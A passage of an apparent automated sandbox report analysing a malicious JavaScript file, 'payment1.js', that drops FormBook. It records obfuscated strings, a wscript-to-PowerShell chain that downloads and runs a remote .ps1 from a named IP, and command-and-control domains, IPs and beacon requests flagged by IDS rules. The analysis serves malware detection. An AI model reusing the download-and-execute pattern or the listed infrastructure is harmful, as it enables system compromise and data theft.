'371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"Scripting.FileSystemObject"', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 4x nop then xor eax, eax | 10_2_03059FB0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 4x nop then mov ebx, 00000004h | 10_2_036504CE

                Networking

                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52381 -> 104.21.16.1:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52511 -> 199.59.243.160:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52584 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52495 -> 199.59.243.160:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52532 -> 199.59.243.160:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52656 -> 162.0.231.203:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52479 -> 199.59.243.160:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52659 -> 162.0.231.203:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52658 -> 162.0.231.203:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52660 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52663 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52661 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52619 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52600 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52665 -> 47.83.1.90:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52662 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52657 -> 162.0.231.203:80
                Source: Network traffic | Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 196.251.92.64:80 -> 192.168.2.4:49731
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52666 -> 47.83.1.90:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52568 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52664 -> 47.83.1.90:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52667 -> 47.83.1.90:80
                Source: C:\Windows\System32\wscript.exe | Network Connect: 196.251.92.64 80
                Source: payment1.js | Return value : ['"MSXML2.XMLHTTP"']
                Source: payment1.js | Argument value : ['"http://196.251.92.64/crypt/popo.ps1","C:\\Temp\\dddddd.ps1"']
                Source: payment1.js | Return value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']
                Source: payment1.js | Return value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba']
                Source: payment1.js | Argument value : ['"GET","http://196.251.92.64/crypt/popo.ps1",false', '"Send"']
                Source: payment1.js | Return value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.infiniteve.xyz
                Source: DNS query: www.weilaishijie.xyz
                Source: global traffic | TCP traffic: 192.168.2.4:52380 -> 1.1.1.1:53
                Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox View | IP Address: 13.248.169.48 13.248.169.48
                Source: unknown | TCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: global traffic | HTTP traffic detected: GET /crypt/popo.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 196.251.92.64 | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.lucynoel6465.shop | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | HTTP traffic detected: GET /0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.travel-cure.sbs | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | HTTP traffic detected: GET /ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.physicsbrain.xyz | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | HTTP traffic detected: GET /rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.infiniteve.xyz | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | HTTP traffic detected: GET /mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.weilaishijie.xyz | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | HTTP traffic detected: GET /xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.dqvcbn.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global traffic | DNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global traffic | DNS traffic detected: DNS query: www.travel-cure.sbs
                Source: global traffic | DNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.infiniteve.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.weilaishijie.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.dqvcbn.info
                Source: unknown | HTTP traffic detected: POST /0c5p/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-us | Host: www.travel-cure.sbs | Origin: http://www.travel-cure.sbs | Referer: http://www.travel-cure.sbs/0c5p/ | Content-Type: application/x-www-form-urlencoded | Content-Length: 201 | Connection: close | Cache-Control: max-age=0 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1) | Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 49 62 71 47 43 57 42 45 36 58 47 70 77 57 55 78 59 33 35 52 47 59 79 59 6a 74 72 66 31 4f 7a 6e 49 49 6c 49 30 4e 66 61 76 41 53 51 48 4c 76 30 70 49 4c 53 32 72 73 70 36 39 63 37 62 45 4e 6f 51 69 43 64 54 6b 30 61 2b 55 4b 67 52 73 50 57 42 4d 46 4b 48 6f 50 37 2f 5a 43 74 48 76 64 2b 39 43 6e 68 51 6c 63 44 2f 72 45 67 77 67 39 62 50 73 31 52 62 56 6b 50 75 68 62 53 45 4e 47 37 35 38 57 5a 39 75 37 4c 6a 42 43 47 36 75 63 42 34 4f 55 66 39 7a 53 48 44 38 79 6a 79 6c 4b 62 62 67 31 5a 4e 35 5a 39 33 64 73 74 71 45 71 6f 66 43 6a 46 51 3d 3d | Data Ascii: JZfd=Um8zWM95iS0bqIbqGCWBE6XGpwWUxY35RGYyYjtrf1OznIIlI0NfavASQHLv0pILS2rsp69c7bENoQiCdTk0a+UKgRsPWBMFKHoP7/ZCtHvd+9CnhQlcD/rEgwg9bPs1RbVkPuhbSENG758WZ9u7LjBCG6ucB4OUf9zSHD8yjylKbbg1ZN5Z93dstqEqofCjFQ==
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 Feb 2025 07:15:08 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Avh9oG%2FGUuJNIk6FyMX5v4igg5uPyGtSmqokcByDkVEsaFhOp2B4HitzxqRiwXYsWV9akBw4X0sO0%2FoVGAi1O1OClzVow30sBGvHn%2F8NKtnvFqPqgGsAgnCSR5VRlCuTowlApyoWQ8E%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 913c39665fed72a1-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 Feb 2025 07:15:50 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 Feb 2025 07:15:52 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 